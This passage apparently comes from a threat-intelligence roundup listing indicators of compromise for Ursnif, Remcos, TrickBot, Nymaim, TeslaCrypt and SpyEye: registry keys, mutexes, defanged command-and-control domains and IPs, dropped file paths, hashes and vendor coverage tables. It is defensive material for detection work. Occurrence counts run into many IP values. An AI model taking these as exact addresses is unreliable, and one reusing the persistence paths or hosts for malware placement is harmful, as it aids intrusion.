                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  www[.]000webhost[.]com62
                  HTTP39
                  www[.]yoursite[.]com18
                  yoursite[.]com18
                  www[.]z3mr4[.]co[.]cc10
                  www[.]subdomain[.]com7
                  www[.]altervista[.]org5
                  www[.]freewebhostingarea[.]com4
                  www[.]hugedomains[.]com4
                  freewha[.]com4
                  err[.]freewebhostingarea[.]com4
                  api[.]w[.]org3
                  gmpg[.]org3
                  iyfsearch[.]com3
                  www[.]dailyetalaat[.]com3
                  static[.]hugedomains[.]com2
                  www[.]mibotnetpol[.]tk2
                  apfrtek[.]freehosting3[.]com2
                  firemoon[.]myftp[.]org2
                  www[.]mrm3n2lok0[.]com2
                  www[.]ethy54[.]azok[.]org2
                  www[.]sgchack[.]tk2
                  www[.]hackedbootnet[.]altervista[.]org2
                  www[.]juztest[.]000a[.]biz2
                  www[.]cyber-power[.]net16[.]net2
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  \dropped.exe83
                  %APPDATA%\<random, matching [A-Fa-z0-9]{5,8}.exe27
                  %APPDATA%\dropped.exe18
                  \<random, matching '[a-z]{4,7}'>.exe14
                  %TEMP%\dropped.exe11
                  %TEMP%\<random, matching '[a-z]{4,9}'>.exe10
                  %ProgramFiles(x86)%\dropped.exe9
                  %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\dropped.exe7
                  \svchost.exe6
                  \TEMP\svchost.exe2
                  %APPDATA%\java.exe2
                  %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe2
                  %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe2
                  %APPDATA%\winupdate.exe1
                  \WinLogonn.exe1
                  %SystemRoot%\dva.exe1
                  %APPDATA%\WinHostMngr.exe1
                  \systemerecoverys.exe1
                  %ProgramFiles(x86)%\svhost.exe1
                  \systemrecoverys.exe1
                  \bot.exe1
                  %APPDATA%\windows-proteccion.exe1
                  %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\jusched.exe1
                  \winlogon.exe1
                  \sys.exe1
                  *See JSON for more IOCs

                  File Hashes

                  023196a258c5e9a714f6b406a6cff36bb4c25d0471a1a56b4d3b9f46d150ae1f 036117b3b838ce7a20cc4aa6b798ff8fa3966f308c03517b14d90dcfa46d010f 0402e0947e984f6a2bf56ddecbd6aea51c73098cfc914b3c289577ccd446d493 075192c857c9c4bef7d18368321d31620e7e0539ecd96000a5393acb8813abea 075ff8393ee0c121d200490ff5506456b5c9450c1589208ac82d31f023929294 0acc97a4ffa1fa86dfecfa5f176a027aeeb4c065d155d93aba50760cfef2c6ff 0c3a2e27ef912b5fb6c17b241e86da27e1146ef0a3db01f8276fe9ba45608b8d 0f64335da1a12fa9ad82fd7103c8a1a981496528e892ab7a10ee3d1c05a3442b 15b85c9bc17b14a093640dfbc1fc1e9c926690ad27bd47eb8a5670449957e9c9 1d92e058049850136bf176705613903a52650693d1baa9ec9b01cb565754b47c 1f576661825d0daf76e1fe297f3de6f90ffd50f554a42dd0e86fc5cd623a2012 22ada87e79518993f2e3af9eba82a6da0dbd7bc3e77a8836454147cc3c3dec6e 27e0f993e69d6123d98b801d026538783e6bffa4678ac4b5343a8c4f96741ab0 282c5f61b701dde8aa4599ce99e1786352cc127317300f8e5e594b2eb3ea1351 29e79e990607b2674c17ef582029a79d447209d8d82ba9ecc5cf0018a38b2365 2a6d5846fc4ec275e50f48770ace19635917593f84373a735c6e05cf5142083e 2bb71d1684473592d3c09495e62de2266cd965a2aba39c2bb69184e1f0ed74ef 2ca36f83972e8da2e176dd2895ec3557f7566295111262d84ae89687b191fb36 2cc88246db7c82b8ad27b1ecf3f588f60321723b7eba960ccac648bf8eeb1cdf 2cdac4031b8316e693eb8871c8abdeee03887cc6608c4b7b11b6bc56d4df73df 2d9eba6cbdbd2f498e26eb3a73772681c5f7fce3c314154cdd5355e11da5bd4c 2dea18d05c5c85cbfe9adbf41213cc09696b6540b9204cb95f433275600722db 30a3c3d914a785eac190a4623ef59b3dc438bb92e9124f55e41d51e0385c8b2f 32eb0e0944dc52cfeb26207c283f9e757bdc8b8a8271be388fe3754782b4f696 3343e10482f4d67995994b94a16fa589f2f17a647c0891e67a0d082582db5add
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Malware.Ursnif-7139346-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
                  Value Name: Blob
                  13
                  <HKCU>\SOFTWARE\MICROSOFT\IAM
                  Value Name: Server ID
                  6
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: apiMPQEC
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Client32
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Client64
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: datat3hc
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Client
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Dmlogpui
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT 1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: Client32
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: Client64
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: datat3hc
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: Dmlogpui
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: apiMPQEC
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: Client
                  1
                  MutexesOccurrences
                  Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}6
                  Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}6
                  Local\{B1443895-5CF6-0B1E-EE75-506F02798413}6
                  {57774070-CAAC-A135-8C7B-9E6580DFB269}6
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  172[.]217[.]3[.]10117
                  13[.]107[.]21[.]2009
                  172[.]217[.]10[.]1109
                  204[.]79[.]197[.]2008
                  172[.]217[.]10[.]788
                  172[.]217[.]10[.]1338
                  185[.]251[.]38[.]1977
                  208[.]67[.]222[.]2226
                  172[.]217[.]12[.]1321
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  wai177iowjedidiah[.]xyz17
                  m18fwairving[.]club11
                  lvinnie65a41ay[.]com11
                  resolver1[.]opendns[.]com6
                  222[.]222[.]67[.]208[.]in-addr[.]arpa6
                  myip[.]opendns[.]com6
                  Files and or directories createdOccurrences
                  \{4BC230AC-2EB3-B560-90AF-42B9C45396FD}6
                  %TEMP%\RES<random, matching '[A-F0-9]{3,4}'>.tmp6
                  %TEMP%\<random, matching [A-F0-9]{4}>.bi16
                  %TEMP%\<random, matching '[a-z0-9]{8}'>.dll6
                  %TEMP%\<random, matching '[a-z0-9]{8}'>.out6
                  %TEMP%\<random, matching '[a-z0-9]{8}'>.0.cs6
                  %TEMP%\<random, matching '[a-z0-9]{8}'>.cmdline6
                  %TEMP%\CSC9FEC3429276401888B76E8C2AE68BB3.TMP1
                  %TEMP%\CSC3409E48E22F1400B95FE520264D3A47.TMP1
                  %TEMP%\CSC330E69B495C9470E8A307FDE1DCCAE.TMP1
                  %TEMP%\CSC330E69B495C9470E9A311BFDE1DCCAE.TMP1
                  %TEMP%\0xobqs0n.tmp1
                  %TEMP%\vvfb3gye.err1
                  %TEMP%\vvfb3gye.tmp1
                  %TEMP%\ntg1z15y.err1
                  %TEMP%\ntg1z15y.tmp1
                  %TEMP%\phcet32c.err1
                  %TEMP%\phcet32c.tmp1
                  %TEMP%\CSC330E69B495C9470E8A311AFDE1DCCAE.TMP1
                  %TEMP%\0xkjv12k.err1
                  %TEMP%\0xkjv12k.tmp1
                  %TEMP%\CSC330E69B495C9470EBA3DFFDE1DCCAE.TMP1
                  %TEMP%\rzfbq10e.err1
                  %TEMP%\rzfbq10e.tmp1
                  %TEMP%\bx1opn4f.err1
                  *See JSON for more IOCs

                  File Hashes

                  0783be77f30524f31ced2fab0a1da860a9bd443263e1611cf26e8073005e578e 1a98e6aaae47877a0eccd691746c91d260937a3f5c110755da606965c1112729 1ca181cb491b5bd981df55f1d7ac4396b6020d38b8620c34e5af7174acf2254b 290f09ae381279ab8c97e14aadca08e62c359a0b1ce3b957578ddd097ac22682 2ba692360c9ebb9790f0a84a76e7b735bed6ffb8c82bfc861721728b5981ebc5 2fe2ed37720da7b06e1582d735743f5222467b06d589870887e62d4b057d09f8 36f600ea6989ee9a6c8821333e44ddd25622ab6a0dc383078c9887dc77c95fee 62714af2a73da1a69d915d05daeba464f65946d957f980862df5aa000fc3c8b2 6b94f9e63d9734dc4667b47c283026772ae0559cec29623296607d611fa6aa01 781aac6cc4e782ce3877c41c20e0715fcc56f76dde8f42e2df41f157b27d131d 7cad4929dc9483277f7c181f4fc7abafba6d67e9cdd65fbffe3bee90c64a2fb2 b7daaa3a091bac248f83bcf00aeec568feb83c490a03575b91909d059c7c2723 c3f2f7bc2b88e59af96157f6cce9b4889b419ca29bdd4075dc09155cd6a4b97e d995b6aeace5dc5fc1dccc3867a15bc65cafff77b2cce3ad4a93b2ff840b1bbb da7254c6feea716f30e709db69d9972633bee2b75a2129933cfe4ec3bea33c92 dc001b6eefd1ea132d5ff7e4c2b8fbd5fb44e5c62b2b5a144a08693b26ece3fb e7ba9ea77e262f55862d8f7432603005fcb1d6c959e312a822c1bcfce48c2aba

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid



                  Umbrella




                  Win.Trojan.Remcos-7136041-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\REMCOS_TBAKKPFJRCZYNTN 19
                  <HKCU>\SOFTWARE\REMCOS_TBAKKPFJRCZYNTN
                  Value Name: EXEpath
                  19
                  MutexesOccurrences
                  Remcos_Mutex_Inj19
                  remcos_tbakkpfjrczyntn19
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  SILKBROWN[.]BIZ19
                  Files and or directories createdOccurrences
                  %APPDATA%\hyerr19
                  %APPDATA%\hyerr\logs.dat19
                  %System32%\Tasks\Modelleres19
                  %APPDATA%\Foreshadower5.exe19

                  File Hashes

                  04db2630c447c200d6b66d5545ced5bfd9b713562c9f975d4b1e34a60399efce 06809f29aa449ee0c5eac9a3956c2e53c4f08ea9992d24a201659c00b1cd8a80 1192c287dde92fe1c792b2122730610e1493fe242098fbb3a2da3f0bbcff0626 1ae04864cf13504552ced7ea85ff535adf38477ff9ca04520ce2781d17303de7 2056c5c204c5196f274f6ceab3dfd7a57de789f3327eb3872de116e433571723 2da878702f8bd11ac4d210e8c328fcbd7eb9bf5825111ba4e3a8a364f3f0f0f1 37bbd1a2db56b164a2e02423b47bdcfcf84bbe8cd98d3d6d9a3a2a46d659bf94 48c1f4427696658634d1a1db9d351ca74671b59c68bf4c3fc822c8e5895f8a10 4a4e9ca03ae19a1e6fef6a7d6bed84dcd66b8b07b3b5328cde53a9b5b5b7d8bf 80529b7f15fd80fb3eb2d05a7d91484c27cc8620c2342dd941568e1ab8031aed 827e49a00bd502dba505b35fc404a490236f3a9016ccaa1b11ccd4551360de2b 859c379889a0137e40112063ae04cb3f035dd9292112da8b02e5af2c6aa8b253 8b991afe7eb5b58d3d6c9586251111a6b7536d76eaca894f92941da818503ae4 934fca8c3e096e138cd25db859f513aef629946222f33b5932672a55e526fe76 a4ed0124c0cc59e88b5443376886b0b71532231d977ba849e5f98a233b8707c6 c751e5a7e2e83bcdd10dcdca29cf08138d455856466f6bc35c3913bade7f6a28 cae9aa03dab3cb4fbad8dbc37a8418e8817ce2a4bc28187c9d98240190b292c3 dcfa83b2d25d02429dc00ed823f6492c9ca248e0b03140f31d638660e2b274aa e45b64e33fe69503ad8d584155d74299b1cff13f481464b190a2efd697845fdc

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Dropper.TrickBot-7135730-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                  Value Name: Blob
                  9
                  MutexesOccurrences
                  Global\316D1C7871E1068
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  89[.]105[.]203[.]18410
                  192[.]3[.]146[.]1799
                  185[.]174[.]172[.]608
                  198[.]46[.]198[.]128
                  200[.]119[.]45[.]1407
                  37[.]228[.]117[.]2507
                  178[.]170[.]189[.]1176
                  82[.]118[.]21[.]996
                  185[.]172[.]129[.]1466
                  107[.]181[.]175[.]1225
                  190[.]13[.]190[.]1785
                  31[.]184[.]253[.]65
                  107[.]22[.]215[.]204
                  131[.]196[.]184[.]1414
                  187[.]58[.]56[.]264
                  198[.]12[.]97[.]2124
                  5[.]53[.]124[.]494
                  146[.]185[.]219[.]274
                  198[.]27[.]74[.]1463
                  172[.]217[.]3[.]1153
                  116[.]203[.]16[.]953
                  185[.]248[.]87[.]883
                  146[.]196[.]122[.]1673
                  189[.]80[.]134[.]1223
                  191[.]37[.]181[.]1523
                  *See JSON for more IOCs
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org15
                  api[.]ipify[.]org6
                  www[.]myexternalip[.]com4
                  ipecho[.]net4
                  ip[.]anysrc[.]net3
                  api[.]ip[.]sb3
                  checkip[.]amazonaws[.]com3
                  wtfismyip[.]com3
                  icanhazip[.]com2
                  ident[.]me1
                  ipinfo[.]io1
                  Files and or directories createdOccurrences
                  %APPDATA%\speedLan68
                  %APPDATA%\speedLan\data68
                  %APPDATA%\speedLan\settings.ini68
                  %System32%\Tasks\Speed lan library68
                  .68

                  File Hashes

                  04cc68fc30be714b023932e85456cf0bb960e7c72c0c07b27a0aeb35cf8fb71e 077e31a93f6d19f4d0a4912f1ffaf0f9cc5dca757fc4c305344b0322f9d95170 0bd995744b6007b5d81ca25eac6f2aac3a9f9b0973fb4d8c319d5efebe0beec0 0e035419a2cd340cd563c1ba4d6a5701191ed97514ff43b0ff72dec3a36b0b50 1089c586a612d0eb070bb3b7adaab25ca21a2b74f5f32503ee11a93191699917 114de28dcd95a63d6ce8d39e9c580c0eaa845e24cf2949ed3bf1abe8e1430bb1 11c4553afa84784bb7933a6985cbf5398080024a209ea93dacd3ab325696d94e 17a1a857bff381e82d53dd579f5e71a9e9618a76cc135270783304d74693875e 17a44bda03089760b062816b65c1a31389e0379a2cc0b56d7bfe5406f791799f 183b29273cdede74e44f33e83441715a1ffd299959ffd94b2822d6c57cf7ff97 1b6324a79bae59678f056144dc2ada1be75a9134705faa87be1071576b67d2b7 1c6dd29936b46416bfad1882fe8d274c5cc456506ced1e3099ac2f28ecc83e24 1cfba2808e9e1f061a78141b42924825ca42209c6a3c767b20036f8b9b36fc03 2029cac9beb5ddfd09f89c164d38df940c9c3df930adb8a9b1f72bbd2724cfc2 2237a25cdf59f0dfee59dbcaf2d2bcf4e1b9416345d0d8dcdfa69355d879705b 22e973106e2ed6be4e73b09d527e4da7c1bc5f6a963999dc84d111e1e15e36a3 24362b930aa0b37e09b100d7e85534660ac8c902282cada914c9653680461fb7 26b22ce48b355abd0e368a786b3006d5d7d3c706deed14a3d112eb6cbbd3f2f5 27a17876f662ff5a8e3cfb99fc6c3289ea89c33b3d86aadbc4725e923f59d394 2882bf641cd6e1a2c29345be31cac1ec05364e04a68e702265e3db6fee3abcbd 2c6236b1b928c9c1171ee9fdba7ab69b6aa138bbca47e25135b42a0bf71d4d05 2d35bf5612f6bf43f52a03a9f2ff6d7dc55dc1351989535a9b9303947008fc09 2e742af09eeb39431cc8ea672c688e1facc6c481ae5bde6f41510180c38da3c5 2f68006ccb92f292a9b3a2091ed24ca37a079515e8d1a8d04417ee02bcf72991 30b4637c55f9af07575f0c7e28135e9a3ca843f3ec2166dd240722b6a9899a85
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Dropper.Nymaim-7135710-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\GOCFK 14
                  <HKCU>\SOFTWARE\MICROSOFT\GOCFK
                  Value Name: mbijg
                  14
                  MutexesOccurrences
                  Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}14
                  Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}14
                  Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}14
                  Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}14
                  Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}14
                  Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}14
                  Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}14
                  Local\{B888AC68-15DA-9362-2153-60CCDE3753D5}14
                  Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}14
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  urbdld[.]com13
                  sgkwcf[.]in13
                  jzhqh[.]pw13
                  uyakvehnglm[.]in13
                  elshuxnhc[.]pw13
                  kuazdamnx[.]pw13
                  ukyffr[.]net13
                  cqgupfbw[.]com13
                  ylslbgzh[.]com13
                  bhbhsllaoxfp[.]in13
                  myiuumylf[.]pw13
                  ouwtnuaujnj[.]com13
                  kpmotg[.]com13
                  uyoegvucna[.]pw13
                  llenpvbww[.]pw13
                  biusulcp[.]com1
                  asmouxe[.]com1
                  retbiq[.]pw1
                  niyzb[.]com1
                  msktndng[.]net1
                  lmgdj[.]pw1
                  kxjoleveza[.]in1
                  scydgzjclxb[.]pw1
                  rqtppygwhgb[.]net1
                  rtsdhccwsyjf[.]pw1
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  %ProgramData%\ph14
                  %ProgramData%\ph\fktiipx.ftf14
                  %TEMP%\gocf.ksv14
                  %ProgramData%\<random, matching '[a-z0-9]{3,7}'>14
                  %APPDATA%\<random, matching '[a-z0-9]{3,7}'>14
                  %LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'>14

                  File Hashes

                  2d4101e26a68ba841691664f2b102e003559458ea5df5010967a820c615bd218 300096cf851508538a09694a71597be71f9a1e7cbacb664053f7b9ec6ef56254 31912de803b6d94833ad5aac693904288d718d98a4db162369b88d28ce486814 324c4463deac99896a6d8634a7c0f1ca2b32de4638cad6a4d6c245d9f7f93567 56afe6eb98d99c184e1a83b105f1425a40f132a47221c2d8f389649879408636 5dab30eb9eb87f97f01eb64c06faaa361a39fc56403ebd36005f208c5e4cfe66 782c73cafa54de836efc2613e006ab4f39f91f65616b773d9ae46275957ec2f5 7c5709b104905ecb64a8a1dfd87a7d3f380405b5ee790074290f5d3348e2aae6 8d371e0fd91fe1b9b0bebdd6f3712ef6246c52dc6f37c4eaf53269fefa57d06b a6fac72b01757f7ba3c8d2789f40fc966e32c10260b14341640a3e8565da3544 b2eb0926631be37902d8f28965d64d5519057cbc46de07f7ea209d7a9ecbb9a4 b4e5f95ef5b0ea44950ec94584228e7243ef4a1b2a4baf93fe4bba1f853f2141 d6b1935b8be102d5fbd67b5551090775e1d41dc1baa5c7dbf0a128ca2ec35c39 f359759b3960ddf91cd3a70636731411f615db1b1dd27d343d698b9680560a49

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid



                  Umbrella




                  Win.Ransomware.TeslaCrypt-7135496-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                  Value Name: EnableLinkedConnections
                  12
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                  Value Name: Blob
                  12
                  <HKCU>\SOFTWARE\ZSYS 12
                  <HKCU>\SOFTWARE\ZSYS
                  Value Name: ID
                  12
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Acrndtd
                  12
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
                  Value Name: CheckSetting
                  12
                  <HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 12
                  <HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
                  Value Name: data
                  12
                  MutexesOccurrences
                  2134-1234-1324-2134-1324-213412
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  198[.]185[.]159[.]14412
                  184[.]168[.]131[.]24112
                  213[.]185[.]87[.]2812
                  43[.]229[.]84[.]11612
                  35[.]195[.]98[.]22012
                  192[.]237[.]132[.]24811
                  204[.]79[.]197[.]2009
                  13[.]107[.]21[.]2008
                  216[.]239[.]36[.]214
                  216[.]239[.]34[.]213
                  216[.]239[.]38[.]213
                  216[.]239[.]32[.]211
                  78[.]47[.]139[.]1021
                  213[.]185[.]88[.]1331
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  myexternalip[.]com12
                  en[.]wikipedia[.]org12
                  www[.]torproject[.]org12
                  ogp[.]me12
                  opengraphprotocol[.]org12
                  static1[.]squarespace[.]com12
                  vr6g2curb2kcidou[.]expay34[.]com12
                  tsbfdsv[.]extr6mchf[.]com12
                  www[.]garrityasphalt[.]com12
                  gjesdalbrass[.]no12
                  garrityasphalt[.]com12
                  TESTADISENO[.]COM12
                  o7zeip6us33igmgw[.]onion[.]to12
                  diskeeper-asia[.]com12
                  kochstudiomaashof[.]de12
                  grassitup[.]com12
                  vrd463xcepsd12cd[.]crsoftware745[.]com12
                  grassitupbluegrass[.]com11
                  www[.]grassitupbluegrass[.]com11
                  Files and or directories createdOccurrences
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QX7W9.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I77RW1L.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I7J37KF.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I9NSD58.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IANXEE8.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IC5NB1M.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ID60W3E.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IIUTK07.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJE160U.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKAVPAE.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IL2NS3P.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$INKC8CM.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IP8M1EE.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IPDP9E0.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISIYA4I.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IV54ALI.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWK2JPN.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWYYKMD.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXC3P46.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ7KADN.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R0Y9SM6.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R0ZU5JT.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R478AKJ.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R4FI238.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R4FKVBH.txt12
                  *See JSON for more IOCs

                  File Hashes

                  0d65ea3ded78d4d778f95fb7b578e0484156ce0664f96c9e670fc39ba32d9499 10dd7d41572281016bd1e00fbd9a620bed11449c7dcf80f9dfe421d7a2b495bb 1d13db5d78dd1f92c89884bf62b01ce30bb66e61d5306b6a9e6d0c3fe8d449af 3d658a771cc4855faaadc1dc5e5bc22a832cc9dde7596bab6b3910e4d076d71c 5d3aae382c5e76531b67eb1216454da32380ed0b209d1d16f565481f2bd9f198 6056a5026ac23e431a4a966b0f1e76ea0563a0bddd4926c4ffb1a0301f57fa3e 67da257dd448e50c61118e2d18e72c5af4538cf0f34a455a551e66307d65bed1 6e98ef200aa863074266c6e0b793bb76cfa7e89226c48e2c85d299653ce6f6ab 9de6d3506741e86a78eab659f6320784feda15e442f909266567f033ed88d6a6 b59e53aa73396d311b5525080950567eaff847266a615f74a43592ef1b968444 bf77ab55ee1faad26faa871fd962f26aa49636ff8db5a8fb3fde52d3e4fcf7c3 e1e70ceb74927640f6c487d7ac6b6071a7d858e2b86001bdfc1fcaf5b826e866

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid



                  Umbrella


                  Malware




                  Win.Dropper.SpyEye-7134261-0

                  Indicators of Compromise

                  MutexesOccurrences
                  __CLEANSWEEP__178
                  Global\5594cda1-c547-11e9-a007-00501e3ae7b59
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  23[.]218[.]40[.]16122
                  199[.]59[.]242[.]1514
                  213[.]155[.]29[.]1443
                  216[.]218[.]206[.]691
                  78[.]153[.]149[.]281
                  185[.]27[.]134[.]921
                  216[.]135[.]83[.]841
                  31[.]170[.]160[.]571
                  64[.]15[.]147[.]2051
                  66[.]90[.]97[.]71
